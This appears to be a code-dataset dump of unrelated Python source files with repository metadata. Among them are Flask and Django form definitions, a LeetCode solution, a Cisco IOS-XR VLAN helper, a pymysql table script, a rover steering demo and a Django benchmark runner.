from flask_wtf import FlaskForm
from wtforms import SubmitField,TextAreaField, RadioField
from wtforms.validators import Required
from wtforms import ValidationError
class PitchForm(FlaskForm):
    """Form for submitting a new pitch together with its category."""
    # Free-text body of the pitch; required.
    content = TextAreaField("Your Pitch ?",validators=[Required()])
    # One category per pitch; value and label are identical for each choice.
    category = RadioField('PitchListing', choices = [('Business', 'Business'), ('comedy', 'comedy'), ('Entertainment', 'Entertainment'),('Politics', 'Politics')])
    submit = SubmitField('Submit')
class CommentForm(FlaskForm):
    """Form for adding a comment to a pitch."""
    description = TextAreaField('Add comment',validators=[Required()])
    submit = SubmitField()
class UpdateProfile(FlaskForm):
    """Form for editing the user's profile bio."""
    bio = TextAreaField('About You.',validators = [Required()])
    submit = SubmitField('Submit')
class ListingForm(FlaskForm):
    """Form for adding a new pitch listing/category."""
    add = TextAreaField('Add Listing.',validators= [Required()])
    submit = SubmitField('Submit')
"vinceoumah@gmail.com"
] | vinceoumah@gmail.com |
400c494c3e5867d7b3257265ba44a3ceebe744a6 | 61f8d25a8ee2afbd3e9d8e79621ff5a2ef0c570c | /amy/workshops/fields.py | 6825e2c715561ed4bd648c3b495b2d8e744c990b | [
"MIT"
] | permissive | annajiat/amy | 40380c5726255fc4cc6ad60c20c9946a38b8bf38 | 13e422ba743a9b5a2d437b4da19625f03e8aeec5 | refs/heads/develop | 2022-05-21T17:03:32.094791 | 2019-12-13T11:22:25 | 2019-12-13T11:22:25 | 227,821,578 | 0 | 0 | MIT | 2019-12-13T11:22:27 | 2019-12-13T11:09:14 | null | UTF-8 | Python | false | false | 6,143 | py | from django_select2.forms import (
Select2Widget as DS2_Select2Widget,
Select2MultipleWidget as DS2_Select2MultipleWidget,
ModelSelect2Widget as DS2_ModelSelect2Widget,
ModelSelect2MultipleWidget as DS2_ModelSelect2MultipleWidget,
Select2TagWidget as DS2_Select2TagWidget,
)
from django.core.validators import RegexValidator, MaxLengthValidator
from django.db import models
from django import forms
from django.utils.safestring import mark_safe
GHUSERNAME_MAX_LENGTH_VALIDATOR = MaxLengthValidator(39,
message='Maximum allowed username length is 39 characters.',
)
# according to https://stackoverflow.com/q/30281026,
# GH username can only contain alphanumeric characters and
# hyphens (but not consecutive), cannot start or end with
# a hyphen, and can't be longer than 39 characters
GHUSERNAME_REGEX_VALIDATOR = RegexValidator(
# regex inspired by above StackOverflow thread
regex=r'^([a-zA-Z\d](?:-?[a-zA-Z\d])*)$',
message='This is not a valid GitHub username.',
)
class NullableGithubUsernameField(models.CharField):
    """CharField preconfigured for optional GitHub usernames.

    Nullable and blank by default, capped at GitHub's 39-character
    username limit, and validated against GitHub's username rules.
    """

    default_validators = [
        GHUSERNAME_MAX_LENGTH_VALIDATOR,
        GHUSERNAME_REGEX_VALIDATOR,
    ]

    def __init__(self, **kwargs):
        # Fill in the field options the caller did not set explicitly.
        for option, fallback in (
            ('null', True),
            ('blank', True),
            ('default', ''),
            ('max_length', 39),  # GH usernames are at most 39 characters
        ):
            kwargs.setdefault(option, fallback)
        super().__init__(**kwargs)
#------------------------------------------------------------
class FakeRequiredMixin:
    """Widget mixin understanding a ``fake_required`` keyword.

    ``fake_required`` marks a field with "*" (asterisk) even though it is
    not actually required, and triggers no validation.  The keyword is
    removed before delegating so parent widgets never see it.
    """

    def __init__(self, *args, **kwargs):
        flag = kwargs.pop('fake_required', False)
        self.fake_required = flag
        super().__init__(*args, **kwargs)
class RadioSelectWithOther(FakeRequiredMixin, forms.RadioSelect):
    """Radio select that renders an extra free-text 'Other' field.

    Several models pair a predefined-choices field with a text input for
    values outside the predefined set.  This widget remembers the name of
    that companion field so both widgets can be rendered in one table row.
    """

    other_field = None  # bound to the companion form field at runtime

    def __init__(self, other_field_name, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.other_field_name = other_field_name
class CheckboxSelectMultipleWithOthers(FakeRequiredMixin, forms.CheckboxSelectMultiple):
    """Multi-checkbox widget that renders an extra free-text 'Other' field.

    Mirrors ``RadioSelectWithOther``: it keeps the name of the companion
    text field so both widgets can be rendered in one table row.
    """

    other_field = None  # bound to the companion form field at runtime

    def __init__(self, other_field_name, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.other_field_name = other_field_name
class RadioSelectFakeMultiple(FakeRequiredMixin, forms.RadioSelect):
    """Pretend to be a radio-select with multiple selection possible. This
    is intended to 'fool' Django into thinking that user selected 1 item on
    a multi-select item list."""

    # Django consults this flag when normalizing submitted data; claiming
    # multi-select keeps the single radio value treated as a selection list.
    allow_multiple_selected = True
class SafeLabelFromInstanceMixin:
    # Mark the instance's string form as safe HTML so the template engine
    # will not escape it when rendering choice labels.
    def label_from_instance(self, obj):
        return mark_safe(obj)
class SafeModelChoiceField(SafeLabelFromInstanceMixin, forms.ModelChoiceField):
    """ModelChoiceField whose option labels may contain (trusted) HTML."""
    pass
class SafeModelMultipleChoiceField(SafeLabelFromInstanceMixin,
                                   forms.ModelMultipleChoiceField):
    """Multiple-select variant of SafeModelChoiceField."""
    pass
class CurriculumModelMultipleChoiceField(SafeModelMultipleChoiceField):
    """Curriculum choice field whose labels carry a Bootstrap tooltip
    showing the curriculum's description."""

    def label_from_instance(self, obj):
        # A tooltip is preferred over a popover: it auto-hides and does not
        # require a click (which with a popover would also select the item).
        markup = (
            '<a tabindex="0" role="button" data-toggle="tooltip" '
            'data-placement="top" title="{description}">{obj}</a>'
        ).format(obj=obj, description=obj.description)
        return super().label_from_instance(markup)
#------------------------------------------------------------
class Select2BootstrapMixin:
    # Apply the Bootstrap 4 theme to every django-select2 widget unless the
    # caller already chose a theme.
    def build_attrs(self, *args, **kwargs):
        attrs = super().build_attrs(*args, **kwargs)
        attrs.setdefault('data-theme', 'bootstrap4')
        return attrs
class Select2NoMinimumInputLength:
    # Show the full option list without requiring any typed input by
    # zeroing Select2's minimum-input-length before other mixins run.
    def build_attrs(self, *args, **kwargs):
        # Let's set up the minimum input length first!
        # It will overwrite `setdefault('data-minimum-input-length')` from
        # other mixins.
        self.attrs.setdefault('data-minimum-input-length', 0)
        attrs = super().build_attrs(*args, **kwargs)
        return attrs
class Select2Widget(FakeRequiredMixin, Select2BootstrapMixin,
                    DS2_Select2Widget):
    """Single-value Select2 dropdown with the Bootstrap theme and the
    optional ``fake_required`` marker."""
    pass
class Select2MultipleWidget(Select2BootstrapMixin, DS2_Select2MultipleWidget):
    """Multi-value Select2 widget with the Bootstrap theme."""
    pass
class ModelSelect2Widget(Select2BootstrapMixin, Select2NoMinimumInputLength,
                         DS2_ModelSelect2Widget):
    """Model-backed Select2 widget: Bootstrap theme, options shown
    without requiring typed input."""
    pass
class ModelSelect2MultipleWidget(Select2BootstrapMixin,
                                 Select2NoMinimumInputLength,
                                 DS2_ModelSelect2MultipleWidget):
    """Multi-value model-backed Select2 widget: Bootstrap theme, options
    shown without requiring typed input."""
    pass
class Select2TagWidget(Select2BootstrapMixin, DS2_Select2TagWidget):
    """Tagging widget that tolerates immutable request QueryDicts."""

    def value_from_datadict(self, data, files, name):
        # Request QueryDicts are immutable, so work on a copy before the
        # setdefault below.  Plain dicts copy just as happily; objects
        # without a ``copy`` method are used as-is.
        try:
            writable = data.copy()
        except AttributeError:
            writable = data
        writable.setdefault(name, '')
        return super().value_from_datadict(writable, files, name)
| [
"piotr@banaszkiewicz.org"
] | piotr@banaszkiewicz.org |
8cdaf71a142ccfe0cfd57bc1020bbaf7ad2bbd60 | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/cs61a/untarred backup/182.py | 3b31cc2ab912f0523f7fde4cccbd92a78b7f0dc9 | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 969 | py | def num_common_letters(goal_word, guess):
"""Returns the number of letters in goal_word that are also in guess.
As per the rules of the game, goal_word cannot have any repeated
letters, but guess is allowed to have repeated letters.
goal_word and guess are assumed to be of the same length.
goal_word and guess are both instances of the word ADT.
>>> mwfs, mwfl = make_word_from_string, make_word_from_list
>>> num_common_letters(mwfs('steal'), mwfs('least'))
5
>>> num_common_letters(mwfs('steal'), mwfl(['s', 't', 'e', 'e', 'l']))
4
>>> num_common_letters(mwfl(['s', 't', 'e', 'a', 'l']), mwfs('thief'))
2
>>> num_common_letters(mwfl(['c', 'a', 'r']), mwfl(['p', 'e', 't']))
0
"""
"*** YOUR CODE HERE ***"
repeat=[]
count=0
for item in get_list(goal_word):
if item in get_list(guess) and item not in repeat:
repeat.append(item)
count+=1
return count
| [
"rrc@berkeley.edu"
] | rrc@berkeley.edu |
75f83ebc463692cc3311e47af2d58ab9bb6ec09a | 3e63befd66d0f8fddaba4ce8c1ed73525c32a5aa | /venv/Lib/site-packages/mediapipe/__init__.py | 18313dee95ea374467c4c87e1029b3bee7e266c5 | [
"MIT"
] | permissive | tanvirtareq/awesome-hand-gesture-detection | b0ecc6636e810412950b705e6ef5c1d83099b547 | ccc836557b730cf34861301712de0de3eec1076d | refs/heads/main | 2023-06-04T02:24:34.452783 | 2021-06-18T11:36:39 | 2021-06-18T11:36:39 | 389,102,297 | 1 | 0 | MIT | 2021-07-24T13:10:45 | 2021-07-24T13:10:45 | null | UTF-8 | Python | false | false | 657 | py | """Copyright 2019 - 2020 The MediaPipe Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from mediapipe.python import *
import mediapipe.python.solutions as solutions
| [
"airriaislam@gmail.com"
] | airriaislam@gmail.com |
284051124955cde290278a36bb4281c6ec7b0c1f | 0dc70961312cfc88e8156a1a5043b3096b377d47 | /leetcode1/isSymmetric.py | 4edb5be3b8fde87912cc8d29e492e3fa6105f74a | [] | no_license | lizyang95/leetcode | 881217bf446caa533c5dbc98638db85e2831fc8b | 16e8a7935811fa71ce71998da8549e29ba68f847 | refs/heads/master | 2020-03-21T11:43:05.910036 | 2018-09-28T15:25:42 | 2018-09-28T15:25:42 | 138,518,698 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,427 | py | # Definition for a binary tree node.
import collections
class TreeNode(object):
    """A binary-tree node holding a value and two child links."""

    def __init__(self, x):
        self.val = x
        self.left = self.right = None
class Solution(object):
    """Iterative symmetry check using an explicit stack of mirrored pairs."""

    def isSymmetric(self, root):
        """Return True when the tree is a mirror image of itself.

        :type root: TreeNode
        :rtype: bool
        """
        if not root:
            return True
        pending = [(root, root)]
        while pending:
            left, right = pending.pop()
            if left is None and right is None:
                continue
            if left is None or right is None:
                return False
            if left.val != right.val:
                return False
            # Mirrored descent: outer children together, inner children together.
            pending.append((left.left, right.right))
            pending.append((left.right, right.left))
        return True
class recursiveSolution(object):
    """Recursive symmetry check: a tree is symmetric iff it mirrors itself."""

    def isSymmetric(self, root):
        return self.isMirror(root, root)

    def isMirror(self, root1, root2):
        """True when the subtrees at root1/root2 are mirror images."""
        if root1 is None and root2 is None:
            return True
        if root1 is None or root2 is None:
            return False
        if root1.val != root2.val:
            return False
        return (self.isMirror(root1.right, root2.left)
                and self.isMirror(root1.left, root2.right))
def main():
    # Smoke test: the tree 2 / (1, 3) is not symmetric, so this prints False.
    sol = Solution()
    root = TreeNode(2)
    root.left = TreeNode(1)
    root.right = TreeNode(3)
    print(sol.isSymmetric(root))

if __name__ == '__main__':
    main()
| [
"yy4@cs.cmu.edu"
] | yy4@cs.cmu.edu |
01b0330ecaa897757aec3ba087c86a68c68d4467 | ddf52813dc439eb931f642f6538fce97e0bacc2e | /setup.py | de41cc2b1a56a4e8a28253be5e785c27e25521f7 | [] | no_license | akashadhikari/SpellNepaliNumber | 935a82b1050be333a3a96c096a6f2bdc5799397b | 04334d5b9f51a4c4a47c3a9600c8e966c58b8393 | refs/heads/master | 2020-04-01T06:06:39.644612 | 2018-10-08T10:14:28 | 2018-10-08T10:14:28 | 152,933,566 | 1 | 0 | null | 2018-10-14T02:50:44 | 2018-10-14T02:50:43 | null | UTF-8 | Python | false | false | 922 | py | try:
from setuptools import setup
except ImportError:
from distutils.core import setup
# requirements = [pkg.split('=')[0] for pkg in open('requirements.txt').readlines()]
# description = "Commandline tool to listen all radio stations of Nepal"
# long_description = open("README.rst").read()
classifiers = ['Environment :: Console',
'Programming Language :: Python :: 3'
]
# version = open('CHANGES.txt').readlines()[0][1:].strip()
setup(
name='SpellNepaliNumber',
version='1.2.1',
description="To Spell Out Nepali Numbers In Nepali Language.",
author='Shital Babu Luitel',
author_email='ctalluitel@gmail.com',
url='https://github.com/shitalluitel/SpellNepaliNumber',
scripts=['src/spellnepalinumber'],
# install_requires=requirements,
packages=['SpellNepaliNumber'],
package_dir = {'SpellNepaliNumber': 'src/SpellNepaliNumber'},
classifiers=classifiers
) | [
"ctalluitel@gmail.com"
] | ctalluitel@gmail.com |
7794e801dd2dc341cf577b374cbd03d0a07ea2ff | 502e97f0ec4f287b8280a546e7f2555ff3a5a1fd | /cnn_3d/main_allSamples.py | d27a1c9f9b73ba49a68d001d76d793350b92d210 | [] | no_license | carlasailer/cnn_ct_pet | d350692be03432e025e33db6296ac33b36bedf08 | 4e256bb73f7ea0ab046c231762001b9f3535bb00 | refs/heads/master | 2020-12-18T23:11:24.048337 | 2020-01-22T10:40:52 | 2020-01-22T10:40:52 | 235,549,036 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,968 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 4 11:02:35 2018
@author: s1287
"""
import os
import time
import datetime
from scripts_CNN.model_creation import Model_Li1
#from scripts_CNN.data_creation import Dataset
from scripts_CNN.data_creation_meddata import Dataset_MedData
from scripts_CNN.model_training import Trainer
from scripts_CNN.model_evaluation import Evaluator
from scripts_CNN.saver import Saver
def getCNNModel(config, data):
    """Factory: build the CNN wrapper selected by ``config["model"]``.

    Raises:
        ValueError: if ``config["model"]`` names no known architecture.
            (The original silently returned None, which crashed later at
            ``cnn_model.model``.)
    """
    if config["model"] == 'Li1':
        return Model_Li1(config=config, data=data)
    raise ValueError("Unknown model: {!r}".format(config["model"]))
def run_main(config):
    """Train and evaluate one CNN configuration end to end.

    Builds the dataset and model from ``config``, trains, evaluates, and
    saves all results under a timestamped folder; prints the elapsed time.
    """
    ##### FILE FOR A SINGLE DATASET FOR FIRST TESTING
    ###### processing
    #start the timer
    start_time = time.time()

    #%% create data
    #data = Dataset(config)
    data = Dataset_MedData(config=config)

    #%% create model
    cnn_model = getCNNModel(config=config, data=data)

    #%% create a results folder
    # NOTE(review): the results path is a hard-coded absolute cluster path.
    time_stamp = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M')
    save_folder = os.path.join('/home/s1287/no_backup/s1287/CNN_PET_Prediction_Results/VoxelPatch/',
                               str(time_stamp + '_' + config["model"]))

    #%% train model
    trainer = Trainer(config=config, model=cnn_model.model, data=data, save_folder=save_folder)

    ##%% evaluate model (uses the trained model and training history)
    evaluator = Evaluator(config=config, model=trainer.training_model, data=data, history=trainer.history,
                          save_folder=trainer.save_folder, training_ssim=trainer.metrics_callback.get_ssim())

    #%% save results, metrics and model artifacts
    Saver(config=config, model=evaluator.evaluation_model, data=data, evaluator=evaluator,
          metrics=evaluator.metrics, trainer=trainer, training_ssim=trainer.metrics_callback.get_ssim())
    # release the model wrapper before timing output
    del cnn_model

    #stop the timer
    elapsed_time = time.time() - start_time
    print('Reached end of program after: ', time.strftime("%H:%M:%S", time.gmtime(elapsed_time)) )
| [
"40063163+carlasailer@users.noreply.github.com"
] | 40063163+carlasailer@users.noreply.github.com |
5d94ee32d2f13dd3088229a40508eabfef487aa3 | 9dcac6f93c2e460009e3355976989adf3bf1af68 | /NextMeeting.py | be0c2848228955655f87d1e815c05ba202d6f2b8 | [] | no_license | lpham4/PythonPractice | 99a4db621a6e524b2264314f1d4d47e2474260f9 | fac0931d09441ad03c4b34abae01f928342d53d7 | refs/heads/main | 2023-01-02T11:56:39.192524 | 2020-10-21T23:45:52 | 2020-10-21T23:45:52 | 306,173,850 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 988 | py | # Class: 1321L
# Section: 02
# Term: Fall 2018
# Instructor: Professor Malcolm
# Name: Ly Pham
# Lab: Python
# Map 0-6 (Sunday-Saturday) to day names; replaces the two duplicated
# seven-branch if/elif chains of the original.
DAY_NAMES = ('Sunday', 'Monday', 'Tuesday', 'Wednesday',
             'Thursday', 'Friday', 'Saturday')

day = int(input("Enter today's day: "))
days = int(input('Enter days until meeting: '))

# Same output as before: the original printed nothing for an out-of-range
# day, so guard the lookup the same way.
if 0 <= day <= 6:
    print('Today is ' + DAY_NAMES[day])

print('Days to the meeting is', days, 'days')

# The weekday wraps around every 7 days.
meeting = (day + days) % 7
if 0 <= meeting <= 6:
    print('Meeting day is ' + DAY_NAMES[meeting])
| [
"lpham4@students.kennesaw.edu"
] | lpham4@students.kennesaw.edu |
d084a33ec6dda9c755028bb84f0fd326b9c56b6d | beb0cbbfc6b910c6eedafc6b6e986e2b48cb260a | /cloudshell/networking/cisco/iosxr/command_actions/add_remove_vlan.py | cebc6d3a1288dc67fdf2c50377733eb2cd76de3c | [] | no_license | QualiSystems/cloudshell-networking-cisco-iosxr | 31a464608c9a382166e6828d6fae34cda75edd44 | cc7a12808a3d6146c7277d1c69b8fddd10010ec7 | refs/heads/master | 2023-05-06T23:54:00.527717 | 2023-04-26T00:47:14 | 2023-04-26T00:47:14 | 347,954,857 | 0 | 0 | null | 2023-04-26T00:47:15 | 2021-03-15T12:10:39 | Python | UTF-8 | Python | false | false | 2,038 | py | from cloudshell.cli.command_template.command_template_executor import (
CommandTemplateExecutor,
)
from cloudshell.networking.cisco.command_actions.add_remove_vlan_actions import (
AddRemoveVlanActions,
)
from cloudshell.networking.cisco.command_templates import (
add_remove_vlan as vlan_command_template,
)
from cloudshell.networking.cisco.command_templates import (
iface as iface_command_template,
)
class CiscoIOSXRAddRemoveVlanActions(AddRemoveVlanActions):
    """VLAN add/remove CLI actions specialized for Cisco IOS-XR devices."""

    def set_vlan_to_interface(
        self,
        vlan_range,
        port_mode,
        port_name,
        qnq,
        c_tag,
        action_map=None,
        error_map=None,
    ):
        """Assign VLAN to a certain interface.

        :param vlan_range: range of vlans to be assigned
        :param port_mode: switchport mode (not used by this IOS-XR
            implementation; kept for base-class interface compatibility)
        :param port_name: interface name
        :param qnq: qinq settings (dot1q tunnel)
        :param c_tag: selective qnq (not used here; kept for base-class
            interface compatibility -- TODO confirm)
        :param action_map: actions will be taken during executing commands
        :param error_map: errors will be raised during executing commands
        """
        # Enter interface configuration in L2 transport mode first.
        CommandTemplateExecutor(
            self._cli_service, iface_command_template.CONFIGURE_INTERFACE
        ).execute_command(port_name=port_name, l2transport="")
        # Bring the interface up before attaching the VLAN sub-interface.
        CommandTemplateExecutor(
            self._cli_service,
            iface_command_template.NO_SHUTDOWN,
            action_map=action_map,
            error_map=error_map,
        ).execute_command()
        if qnq:
            # QinQ (dot1q tunnel): create the sub-interface with the qnq flag.
            CommandTemplateExecutor(
                self._cli_service,
                vlan_command_template.VLAN_SUB_IFACE,
                action_map=action_map,
                error_map=error_map,
            ).execute_command(vlan_id=vlan_range, qnq="")
        else:
            # Plain (untagged) sub-interface for the given VLAN range.
            CommandTemplateExecutor(
                self._cli_service,
                vlan_command_template.VLAN_SUB_IFACE,
                action_map=action_map,
                error_map=error_map,
            ).execute_command(vlan_id=vlan_range, untagged="")
| [
"anton.p@qualisystems.com"
] | anton.p@qualisystems.com |
1811bfd210cdbdc3d327ce32a5ca4946b3cc3247 | 50008b3b7fb7e14f793e92f5b27bf302112a3cb4 | /recipes/Python/131495_lazy_attributes/recipe-131495.py | 874a7af85b7f5574564b52b2f09ea5755b13849d | [
"Python-2.0",
"MIT"
] | permissive | betty29/code-1 | db56807e19ac9cfe711b41d475a322c168cfdca6 | d097ca0ad6a6aee2180d32dce6a3322621f655fd | refs/heads/master | 2023-03-14T08:15:47.492844 | 2021-02-24T15:39:59 | 2021-02-24T15:39:59 | 341,878,663 | 0 | 0 | MIT | 2021-02-24T15:40:00 | 2021-02-24T11:31:15 | Python | UTF-8 | Python | false | false | 1,432 | py | #
# first solution:
#
class sample(object):
    # Lazy attribute via a non-data descriptor (Python 2): __get__ runs
    # on first access, caches the value in the instance dict (which then
    # shadows the descriptor), and returns it.
    class one(object):
        def __get__(self, obj, type=None):
            print "computing ..."
            obj.one = 1  # cache on the instance; later lookups skip __get__
            return 1
    one = one()
x=sample()
print x.one  # first access: prints "computing ..." then 1
print x.one  # cached: prints 1 only
#
# other solution:
#
# lazy attribute descriptor
class lazyattr(object):
    # Descriptor that computes a value once (via fget) and then replaces
    # itself with the result on the instance (Python 2 code).
    def __init__(self, fget, doc=''):
        self.fget = fget
        self.__doc__ = doc
    def __appoint__(self, name, cl_name):
        # Called by the 'appointer' metaclass to tell the descriptor the
        # attribute name it was bound to; binding twice is an error.
        if hasattr(self,"name"):
            raise SyntaxError, "conflict between "+name+" and "+self.name
        self.name = name
    def __get__(self, obj, cl=None):
        if obj is None:
            # Class-level access returns the descriptor itself.
            return self
        value = self.fget(obj)
        setattr(obj, self.name, value)  # cache: shadows this descriptor
        return value
# appointer metaclass:
# call the members __appoint__ method
class appointer(type):
    # Metaclass that, at class-creation time, notifies each class member
    # supporting __appoint__ of the name it was bound to (Python 2).
    def __init__(self, cl_name, bases, namespace):
        for name,obj in namespace.iteritems():
            try:
                obj.__appoint__(name, cl_name)
            except AttributeError:
                # Member has no __appoint__ hook -- skip it.
                pass
        super(appointer, self).__init__(cl_name, bases, namespace)
# base class for lazyattr users
class lazyuser(object):
    # Base class wiring in the appointer metaclass (Python 2 hook).
    __metaclass__ = appointer
# usage sample
class sample(lazyuser):
    def one(self):
        print "computing ..."
        return 1
    one = lazyattr(one, "one lazyattr")
x=sample()
print x.one  # computed and cached on first access
print x.one  # served from the instance cache
del x.one    # deleting the cache re-exposes the descriptor
print x.one  # recomputed
| [
"betty@qburst.com"
] | betty@qburst.com |
57581e21464b436ecef0539ec631f309d19d2e4a | 1a949f20cafe328c5ad145659903e8dc5d974a76 | /pages/urls.py | 44251d6aa86a15c40c48679c4545fe1989989b61 | [] | no_license | Fabricourt/plotx | 7154be9153ab532796a16a1de3125276913fca97 | b2a526d4a9236217978a48a997b3b425cd40c0a9 | refs/heads/master | 2022-12-11T18:57:36.631087 | 2020-07-07T17:22:50 | 2020-07-07T17:22:50 | 230,000,109 | 0 | 1 | null | 2022-12-08T03:27:54 | 2019-12-24T20:25:39 | JavaScript | UTF-8 | Python | false | false | 515 | py | from django.urls import path
from django.views.generic import RedirectView
from . import views
urlpatterns = [
    # Landing page and static content pages.
    path('', views.index, name='index'),
    path('about', views.about, name='about'),
    path('homework', views.homework, name='homework'),
    path('gallery', views.gallery, name='gallery'),
    # Device category pages.
    path('mobile', views.mobile, name='mobile'),
    path('tablet', views.tablet, name='tablet'),
    path('laptop', views.laptop, name='laptop'),
    # NOTE(review): view name is capitalized unlike the others --
    # presumably a function named Dashboard in views; confirm consistency.
    path('dashboard', views.Dashboard, name='dashboard'),
] | [
"mfalme2030@gmail.com"
] | mfalme2030@gmail.com |
c56cffdde03bab85092fdc019d0e6bff748a33d7 | 41523dd4871e8ed1043d2b3ddf73417fcbdde209 | /mysqldemo/创建表.py | 7062a2f4c4027ad264a212153fdf7e2a85d24ed8 | [] | no_license | WayneChen1994/Python1805 | 2aa1c611f8902b8373b8c9a4e06354c25f8826d6 | a168cd3b7749afc326ec4326db413378fd3677d5 | refs/heads/master | 2020-03-30T23:19:00.773288 | 2018-11-02T10:47:40 | 2018-11-02T10:47:40 | 151,697,105 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 381 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# author:Wayne
import pymysql
# Create the `teacher` table in the `studb` database.
db = pymysql.connect("127.0.0.1", "root", "0831", "studb")
try:
    # pymysql cursors are context managers; the cursor is closed on exit.
    with db.cursor() as cursor:
        # Same SQL text as before, built via implicit string concatenation.
        sql = (
            "create table teacher("
            "id int not null auto_increment primary key,"
            "name varchar(20) not null,"
            "age int not null)"
        )
        cursor.execute(sql)
        # DDL statements return no result rows, so this is always None;
        # kept so the script prints exactly what it used to.
        res = cursor.fetchone()
        print(res)
finally:
    # Fix: release the connection even when table creation fails
    # (the original leaked the connection on any exception).
    db.close()
| [
"waynechen1994@163.com"
] | waynechen1994@163.com |
e2b116150dae39a52c16e8b225e000bc2dc8f3b4 | fdedfbc1290016ae293edcc41df96d0a3fb8a99c | /code_backup/import_test.py | 394e1b10f06e2e12afa69c34918b7f0bc8fe5a69 | [] | no_license | Hsingmin/machine-learning | 5d798ff974429fccb84ad61b2f72f4bb375c80e3 | a554d9c2324b5daf0dde4c78f4a9b6e6b630e413 | refs/heads/master | 2021-01-23T18:47:51.153195 | 2018-06-14T14:48:09 | 2018-06-14T14:48:09 | 102,808,183 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 218 | py | #coding:utf-8
import ocr.keys as keys
# Module-level variable read by show_keys below.
extern = 'extern massage...'
def show_keys():
    """Demonstrate importing a sibling module (ocr.keys) from the same
    package and reading this module's own global."""
    print('__ import keys in same package __')
    characters = keys.alphabet[:]  # shallow copy of the alphabet sequence
    print(characters[0:100])       # show only the first 100 entries
    print(extern)  # NOTE(review): assumed inside the function -- confirm
| [
"alfred_bit@sina.cn"
] | alfred_bit@sina.cn |
4efe234a9da2c91c8a2c5dbc01f699b952539852 | 2e1a1d6d4ffe9da205413cbd395beb98b84369a3 | /run_benchmark.py | 50ac0f3b2519575b788eb1483b5c9b322199dd77 | [] | permissive | BertrandBordage/django-tree | 068838cb604a47d705941813c291fa25094e4238 | ee8f9bbdb7dbe7d78a5b5c2d3174cc9c3d166171 | refs/heads/master | 2023-07-09T23:24:51.401239 | 2023-07-09T14:08:02 | 2023-07-09T14:08:02 | 52,733,318 | 84 | 11 | BSD-3-Clause | 2022-06-21T21:09:17 | 2016-02-28T17:22:19 | Python | UTF-8 | Python | false | false | 699 | py | #!/usr/bin/env python
import argparse
import os
import django
if __name__ == '__main__':
    # Parse benchmark options before touching any Django machinery.
    parser = argparse.ArgumentParser()
    parser.add_argument('--run-django-tree-only', action='store_true')
    parser.add_argument('--db-optimization-interval', type=int, default=100)
    parser.add_argument('selected_tests', nargs='*', type=str)
    args = parser.parse_args()

    # Point Django at the benchmark settings, then initialize it.
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'benchmark.settings')
    django.setup()

    # Imported only after django.setup() so app loading has completed.
    from benchmark.base import Benchmark

    Benchmark(
        run_django_tree_only=args.run_django_tree_only,
        db_optimization_interval=args.db_optimization_interval,
        selected_tests=args.selected_tests,
    ).run()
| [
"bordage.bertrand@gmail.com"
] | bordage.bertrand@gmail.com |
5e2045a72218448c42c0388df9e8a06f6034e419 | a998fa930f5483fdef4770ff4c9fa6edcbbf159c | /01_sample_search_and_return/05_decision_to_go.py | f381c800e801be121fd6986c7df02981afa03f54 | [] | no_license | lmquan1609/robot | dde9cc86d61b0ff88397bb490423932acc8b94e7 | 927d4d387fc1734b11147f0caf8a768fa5fb6093 | refs/heads/master | 2020-12-02T00:33:17.800436 | 2019-12-31T09:48:07 | 2019-12-31T09:48:07 | 230,830,545 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,226 | py | import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import numpy as np
import cv2
from decision_extra_functions import *
# Define a function to convert from cartesian to polar coordinates
def to_polar_coords(xpix, ypix):
    """Convert cartesian pixel coordinates to polar form.

    Both arguments are equal-length array-likes; the result is a pair of
    numpy arrays: (distance from the origin, angle from the +x axis).
    """
    radial_distance = np.sqrt(xpix ** 2 + ypix ** 2)
    direction = np.arctan2(ypix, xpix)
    return radial_distance, direction
# Load the sample frame and run the perception pipeline: warp to a
# top-down view, threshold for navigable terrain, convert to rover
# coordinates, then to polar form.
image = mpimg.imread('angle_example.jpg')
warped = perspect_transform(image)
colorsel = color_thresh(warped, rgb_thresh=(160, 160, 160))
xpix, ypix = rover_coords(colorsel)
distances, angles = to_polar_coords(xpix, ypix)
# Mean angle of all navigable pixels = suggested heading.
avg_angle = angles.mean()
# Do some plotting
fig = plt.figure(figsize=(12,9))
plt.subplot(221)
plt.imshow(image)
plt.subplot(222)
plt.imshow(warped)
plt.subplot(223)
plt.imshow(colorsel, cmap='gray')
plt.subplot(224)
plt.plot(xpix, ypix, '.')
plt.ylim(-160, 160)
plt.xlim(0, 160)
# Draw the mean-angle heading as an arrow from the rover's position.
arrow_length = 100
x_arrow = arrow_length * np.cos(avg_angle)
y_arrow = arrow_length * np.sin(avg_angle)
plt.arrow(0, 0, x_arrow, y_arrow, color='red', zorder=2, head_width=10, width=2)
plt.show()
# Clamp the steering command to the rover's +/-15 degree limit.
avg_angle_degrees = avg_angle * 180/np.pi
steering = np.clip(avg_angle_degrees, -15, 15)
print(f'Steering at {steering}, with {avg_angle_degrees}')
"ITITIU15033@student.hcmiu.edu.vn"
] | ITITIU15033@student.hcmiu.edu.vn |
